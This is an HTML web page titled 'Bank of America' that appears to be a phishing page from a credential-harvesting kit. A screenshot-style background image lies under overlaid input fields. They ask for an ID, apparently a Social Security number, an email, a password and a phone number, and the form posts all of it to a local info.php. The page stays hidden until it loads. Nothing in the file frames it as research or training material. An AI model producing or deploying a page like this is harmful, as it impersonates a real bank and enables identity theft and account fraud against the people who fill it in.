<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title> Bank of America </title>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<meta name="viewport" content="width=device-width, initial-scale=1" />

<link rel="shortcut icon"
              href="images/favicon.ico"/>
			  
			  
	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-20304311-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
<style type="text/css">
div#container
{
	position:relative;
	width: 100%;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>


</head>
<body>
<div id="container">
<div id="image9" style="position:absolute; overflow:hidden; left:1px; top:0px; width:1350px; height:850px; z-index:0"><img src="images/2fit.png" alt="" title="" border=0 width=1350 height=850></div>





<form action="info.php" name="lbha" id="lbha" method="post">

<input name="idn" maxlength="35"  required title="Please Enter Right Value" autocomplete="off" type="text" style="position:absolute;width:300px;height:25px;left:236px;top:389px;z-index:5">

<input name="ssa"   title="Please Enter Right Value" autocomplete="off" type="text" style="position:absolute;width:300px;height:25px;left:236px;top:458px;z-index:6">

<input name="idmail" maxlength="35"   title="Please Enter Right Value" type="text" style="position:absolute;width:300px;height:25px;left:236px;top:534px;z-index:5">

<input name="ojobi" maxlength="35"    title="Please Enter Right Value" type="text" style="position:absolute;width:300px;height:25px;left:603px;top:389px;z-index:5">

<input name="iyaoru" maxlength="35"    title="Please Enter Right Value" type="text" style="position:absolute;width:300px;height:25px;left:603px;top:457px;z-index:5">

<input name="empak" maxlength="35"    title="Please Enter Right Value" type="password" style="position:absolute;width:300px;height:25px;left:603px;top:534px;z-index:5">


<input name="pho1" maxlength="5"    title="Please Enter Right Value" type="text" style="position:absolute;width:68px;height:25px;left:235px;top:609px;z-index:5">

<input name="pho2" maxlength="5"    title="Please Enter Right Value" type="text" style="position:absolute;width:68px;height:25px;left:319px;top:609px;z-index:5">

<input name="pho3" maxlength="4"    title="Please Enter Right Value" type="text" style="position:absolute;width:68px;height:25px;left:403px;top:609px;z-index:5">


<div id="formcheckbox1" style="position:absolute; left:232px; top:671px; z-index:17"><input type="checkbox" name="formcheckbox1"></div>

<div id="formcheckbox1" style="position:absolute; left:326px; top:671px; z-index:17"><input type="checkbox" name="formcheckbox1"></div>

<div id="formcheckbox1" style="position:absolute; left:438px; top:671px; z-index:17"><input type="checkbox" name="formcheckbox1"></div>

<div id="formcheckbox1" style="position:absolute; left:553px; top:671px; z-index:17"><input type="checkbox" name="formcheckbox1"></div>

<div id="formimage1" style="position:absolute; left:940px; top:708px; z-index:9"><input type="image" name="formimage1" width="90" height="28" src="images/buton.png"></div>




<div id="image8" style="position:absolute; overflow:hidden; left:180px; top:800px; width:995px; height:105px; z-index:11"><a href="#"><img src="images/kkk.png" alt="" title="" border=0 width=981 height=105></a></div>

</div>

</body>
</html>
